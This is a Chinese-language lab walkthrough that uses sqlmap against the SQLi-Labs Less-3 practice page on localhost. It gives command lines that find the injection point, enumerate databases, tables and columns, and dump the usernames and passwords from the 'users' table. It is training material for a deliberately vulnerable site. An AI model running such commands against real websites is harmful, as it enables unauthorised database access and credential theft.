1.访问SQLi-Labs网站
访问Less-3,并根据网页提示给定一个GET参数
http://127.0.0.1/sqli-labs/Less-3/?id=1
2.启动SQLMAP
进入sqlmap目录,在搜索框输入cmd,并回车
3.寻找注入点
使用以下命令自动寻找网站的注入点,并获取网站及后台数据库的基本信息:
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-3/?id=1"
检测结果:
4.获取数据库的库名
1)获取所有数据库的库名
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-3/?id=1" --dbs
2)获取当前数据库的库名
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-3/?id=1" --current-db
5.获取security数据库中的所有表名
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-3/?id=1" -D security --tables
其中,有一个名为users的表,这当中可能存放着网站用户的基本信息。
6.获取users表的全部字段名
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-3/?id=1" -D security -T users --columns
7.获取users表id,username和password字段的全部值
python sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-3/?id=1" -D security -T users -C id,username,password --dump